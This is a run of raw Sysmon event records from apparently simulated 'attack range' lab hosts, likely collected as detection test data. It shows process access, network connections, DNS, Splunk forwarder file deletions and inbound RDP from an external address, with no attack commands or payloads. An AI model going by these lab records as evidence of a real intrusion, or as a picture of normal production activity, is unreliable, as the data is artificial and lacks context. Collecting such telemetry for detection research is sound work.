10341000x8000000000000000205756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-18A7-629A-6042-000000005F02}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A7-629A-6042-000000005F02}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-18A7-629A-6042-000000005F02}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044618Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:20.663{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044620Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:24.436{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963494D9E4209BBAC591CD0A5F942FD6,SHA256=EE82F6D5161D139FCEC2A2159D4D4C953CE074CB66692C70ADEDE6CD710C2194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:24.590{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7348E71EF1F9C59A7F45042DE4982BE,SHA256=C21EC5AEF64701732068C2DAECDB5AD6283642529CEDEDF051C7FF6193D6A460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:24.252{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08C76502E4C7E4D845B79F7B3FCDD1EB,SHA256=906FED5EAAB44BE73B4B7C9AB47C7CA5FA70DCFABB5AB1B727ED1E3256B6627B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044621Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:25.530{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D810264905315F5B79072CC2BBC886,SHA256=CA965946553428D0E26D9607AE6D5B8FCA5EBEFE3E9ABC59209185771C8195CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:25.736{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA7F89D8FF38BE93163B8034F6CBFF6,SHA256=74F06ADE4A7D78920BF8DF9DC45A163DB360C1FE864A29D78D1EE82A477CA3AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.010{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56405-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local445microsoft-ds 354300x8000000000000000205770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.010{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56405-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local445microsoft-ds 354300x8000000000000000205769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:22.895{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56404-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:22.895{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56404-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:22.881{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56403-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:22.880{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56403-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x800000000000000044622Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:26.623{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=870C9B7FD447014A8D077E88E3FB6DFB,SHA256=D3DACFAE09FE1266B980C3C11744C074F96E82CD14FFBFC6501F3E938885ABAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:26.871{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B8AC54AF616211BEEC8FDDCBCF45DDC,SHA256=302ABEBE1694F219BF3E676BFE2DF20959FFCD98890C318180C42FD26488E02C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.800{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56406-false10.0.1.12-8000- 23542300x800000000000000044623Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:27.717{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB4657F4E5F30F852A47CF10E9CCAA2,SHA256=905DCBE22BD57DC5D4E0B427FC4E45F81EE59B05DDD3B560C9F0D0BCB3CAE495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:27.905{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB1606893F215E4C9C07B7E285A93FD,SHA256=EE95D5E279755AC12BC2861212951F6E39DCAFD5A6675D6CA167457CD7116F69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:28.951{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0827F01B0D97C1077DC0D17909706308,SHA256=6C716810CC0314F1A94977018C89F089169B1BD24B0E86EF0B7A19FE727927AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044625Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:28.811{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A98EE4648CBEC6E232B76C87229AE01A,SHA256=D56BE74B12C02A7756DE81A57DBD09283532226E0913FBB0C3FB9B8274F90D32,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044624Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:25.725{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52372-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044627Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:29.905{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DED31CDB05854E290F9D55AAE083B0,SHA256=C4369B4E993AC9BCBFFFDB016BA1B3C43A287E42C3FD5199E43016F8B416736A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:29.435{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=CC0C0C3E674376BF11FC2CA3A643238D,SHA256=D380AF2288611DFFA005785312CA7B93CE6181DA505167CEFD4BD92D58F971D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044626Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:27.678{0A5DF930-E35C-6299-1000-000000006002}932C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.156.72.6-64672-false10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000205779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:28.062{2E1864BB-E13E-6299-0F00-000000005F02}308C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.156.72.6-64525-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local3389ms-wbt-server 23542300x8000000000000000205778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:30.003{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DC178BCCCB47F15662FA59CAEEF7ACB,SHA256=D9ED5EDA9B105F4D49DBF07D53F1CE9510C71B89046D2BB875EAA1297DB6BA00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:28.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62195-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:28.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60953- 23542300x8000000000000000205780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:31.088{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A57D185358B0021FDB220F6FC6996E9,SHA256=590788CD113FD628EC669C28CA91FE3A5C9E01DBB640BABCEC8C9926366B0877,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044629Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:28.774{0A5DF930-E35C-6299-1600-000000006002}1244C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:2150:fc7c:9820:b23:8dc3:ffff-60953-truea00:10e:0:0:0:0:0:0-53domain 23542300x800000000000000044628Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:30.998{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C17E2F34B2D0E62F90128F2C98EC95,SHA256=2DA64B463546906236648D81646FCB2CCD2D4BE078188EF703C927104F3CFE34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:29.868{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60953- 354300x8000000000000000205786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:29.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000205785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:29.760{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:29.729{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56407-false10.0.1.12-8000- 23542300x8000000000000000205783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:32.134{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D635097FC98204057F3EB05FB58543B,SHA256=5A3464D3960B2FE5E9AB03F99DA9C5B69812BAA91536001237794A3067771982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044630Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:32.095{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A738890913CE7EA5D18136D01B1D5579,SHA256=B756DC29D21D95CA0693043BF177A59FE95BBBD40187E1389DD7439B83E079FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044632Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:31.694{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044631Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:33.186{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB6B5FEE765886649E1B9A985F7E04C,SHA256=20AA87FD3BC0C86096071B31DACD762F625728045FD20036AB824E9063A7C95B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:30.868{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60953- 354300x8000000000000000205790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:30.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65137- 354300x8000000000000000205789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:30.760{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:213f:5d5:ffff-65137-true7f00:1:0:0:0:0:0:0-53domain 23542300x8000000000000000205788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:33.169{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B57DE91B898BF29E5E313C97C9F40BA,SHA256=7B866F8AB0EE3B7E595667FB096F5F64B2A4B16BB2784C5FF435F0E95636AAAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044633Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:34.280{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C0190048AED038878AA0499185EB2D6,SHA256=9E374CD159D1220D7E3F38B8D80467BA07E7A93E2FB4BE4ABD410D9B66A8D1E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:31.775{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65137- 354300x8000000000000000205793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:31.775{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:213f:5d5:ffff-65137-true7f00:1:0:0:0:0:0:0-53domain 23542300x8000000000000000205792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.218{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE5AA8CAD7CA23C3C6D4E48E065BCEE,SHA256=DE1D725DC8CE9D8EEE6B521CE0853D97A3BB691AE9E064893A0D74D1CACBFEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044634Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:35.373{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=780B2653E8254C091998F41AD3586234,SHA256=255D2B971531E7BA44477ABF251E0F40A50315A6EEAD1ABA1865068DD6DA9877,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:32.884{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61454-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 